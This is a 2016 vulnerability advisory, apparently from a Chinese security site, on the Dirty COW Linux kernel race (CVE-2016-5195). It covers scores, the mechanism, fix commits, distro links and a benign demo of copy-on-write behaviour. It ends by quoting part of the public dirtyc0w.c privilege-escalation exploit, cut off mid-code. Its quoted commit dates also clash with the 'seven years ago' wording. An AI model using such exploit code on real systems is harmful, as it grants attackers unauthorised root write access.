myhack58 (Anonymous) MYHACK58:62201680403
History: Oct 21, 2016 - 12:00 a.m.

CVE-2016-5195 Dirty COW vulnerability: a Linux kernel privilege escalation affecting all versions - Vulnerability warning - Black Bar Safety Net (myhack58)

2016-10-21 00:00:00 | Anonymous | www.myhack58.com | 57

CVSS3: 7.8 High
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

CVSS2: 7.2 High
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
Access Vector: LOCAL
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE

EPSS: 0.879 High (percentile 98.4%)

Vulnerability description
Vulnerability ID: CVE-2016-5195
Vulnerability name: Dirty COW
Impact: a low-privileged user can exploit this vulnerability to escalate privileges locally on all versions of Linux.
Affected scope: Linux kernel >= 2.6.22. Affected since 2007; fixed on 18 October 2016.
360 Vulpecker Team: tested the vulnerability PoC on Android 7.0 with the latest October security patch level and confirmed that Android is affected.
Why is this vulnerability called Dirty COW?
The Linux kernel's memory subsystem has a race condition in its handling of copy-on-write (COW) for private read-only memory mappings; winning the race corrupts such a mapping. A low-privileged local user can exploit this to gain write access to memory mappings that should be read-only, which can lead to privilege escalation.
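The copy-on-write contract that the paragraph above describes, shown as an added example that is not code from the original article or from the dirtycow project. It maps a file opened read-only as MAP_PRIVATE with PROT_WRITE, writes to the mapping, checks that the file on disk is untouched, then uses madvise(MADV_DONTNEED) to discard the private copy and checks that the mapping shows the file content again. It assumes a Linux host with a writable /tmp; the file content and the written text are constructed sample values.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#define ORIG_TEXT "this is not a test"   /* constructed sample file content */
#define PRIV_TEXT "private copy only"   /* constructed; same length as ORIG_TEXT */

/* Reads the file back from disk into buf (at most n-1 bytes), NUL-terminated. */
static int read_file(const char *path, char *buf, size_t n)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    ssize_t got = read(fd, buf, n - 1);
    close(fd);
    if (got < 0) return -1;
    buf[got] = '\0';
    return 0;
}

/* Exercises the documented copy-on-write behaviour of a private file mapping.
   Returns a bitmask of observations; 7 means everything behaved as specified:
     bit 0: after the write, the mapping shows the private copy
     bit 1: the file on disk is untouched by that write
     bit 2: after MADV_DONTNEED the private copy is gone and the mapping
            shows the file content again (the page is re-faulted from the file)
   Returns -1 on a setup error (temporary file could not be created or mapped). */
int cow_contract(void)
{
    char path[] = "/tmp/cowdemoXXXXXX";   /* assumption: /tmp is writable */
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    size_t len = strlen(ORIG_TEXT);
    if (write(fd, ORIG_TEXT, len) != (ssize_t)len) { close(fd); unlink(path); return -1; }
    close(fd);

    /* Open read-only, as an unprivileged reader of a 0404 file would, and map it
       MAP_PRIVATE with PROT_WRITE: the kernel promises that writes land in a
       private anonymous copy and never reach the file. */
    fd = open(path, O_RDONLY);
    if (fd < 0) { unlink(path); return -1; }
    char *map = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    close(fd);
    if (map == MAP_FAILED) { unlink(path); return -1; }

    int result = 0;
    char disk[64];

    memcpy(map, PRIV_TEXT, len);                       /* triggers the COW fault */
    if (memcmp(map, PRIV_TEXT, len) == 0) result |= 1;
    if (read_file(path, disk, sizeof disk) == 0 && strcmp(disk, ORIG_TEXT) == 0) result |= 2;

    /* Discard the private copy; the next access re-faults the page from the file. */
    if (madvise(map, len, MADV_DONTNEED) == 0 && memcmp(map, ORIG_TEXT, len) == 0) result |= 4;

    munmap(map, len);
    unlink(path);
    return result;
}

int main(void)
{
    int r = cow_contract();
    printf("cow_contract() = %d (7 = write stayed private, file untouched, DONTNEED re-faulted from file)\n", r);
    return r == 7 ? 0 : 1;
}
```

The two primitives used here, a private write that must stay private and MADV_DONTNEED discarding that private copy, are exactly the ones the bug involves: on a patched kernel the sequence above always yields 7, and the guarantee behind bit 1 (the file is never modified through a private mapping) is the one CVE-2016-5195 let a local user break by racing the two operations.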
Vulnerability details
Vulnerability details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
According to Red Hat's report, exploitation of this vulnerability has already been found in the wild. So far there is no further news.
https://access.redhat.com/security/vulnerabilities/2706661
Commit messages:
commit 4ceb5db9757aaeadcf8fbbf97d76bd42aa4df0d6
Author: Linus Torvalds
Date: Mon Aug 1 11:14:49 2005 -0700
Fix the get_user_pages() race condition for write access
If another thread updates the page table while we are in handle_mm_fault(), handle_mm_fault() will likely end up needing us to re-do the operation. handle_mm_fault() has no real protection against the COW break being undone. This looks nice, but get_user_pages() re-reads the page after the fault returns, so get_user_pages() was rewritten: it needs the dirty bit to be set, and the simplest fix for the race condition is that if the COW break fails for some reason, we just keep looping and retry.
commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619
Author: Linus Torvalds
Date: Thu Oct 13 20:07:36 2016 GMT
This is an age-old bug; I already tried to fix it once, 7 years ago, in commit 4ceb5db9757a, but it was rolled back by commit f33ea7f404e5 due to some issues. This time we test the pte_dirty() bit.
Distribution advisories for this vulnerability
Red Hat: https://access.redhat.com/security/cve/cve-2016-5195
Debian: https://security-tracker.debian.org/tracker/CVE-2016-5195
Ubuntu: http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html
Affected scope
Kernels since 2.6.22 (2007) are affected; the vulnerability was fixed on 18 October 2016.
How to fix the vulnerability?
The Linux team has actively fixed this vulnerability; update to the latest release to get the fix. Software developers can also apply the fix commit
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619
and recompile Linux to close the vulnerability.
How do I find out whether someone is using the exploit against me?
Exploiting this bug leaves no exception information in the logs. However, part of the security community has deployed honeypots; if an attacker exploits this vulnerability on one, it triggers an alarm.
Who found this vulnerability?
Phil Oester (https://access.redhat.com/security/cve/CVE-2016-5195)
The discoverers even set up a dedicated website, Twitter account and GitHub account for the vulnerability, and had someone design a logo for it.
Their explanation: "We all make fun of branded vulnerabilities too, but perhaps this is not the right time to take that stand. So, to show where we stand, we only created a website, an online shop and a Twitter account, and asked a professional designer to design a logo for this vulnerability."
2016.10.21 13:37 update on vulnerability scope:
360 Vulpecker Team: tested the vulnerability PoC on Android 7.0 with the latest October security patch level and confirmed that Android is affected.
2016.10.21 9:10 update, PoC:
PoC address:
https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c
```c
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/stat.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
}

void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
> The in the wild exploit we are aware of doesn't work on Red Hat
```
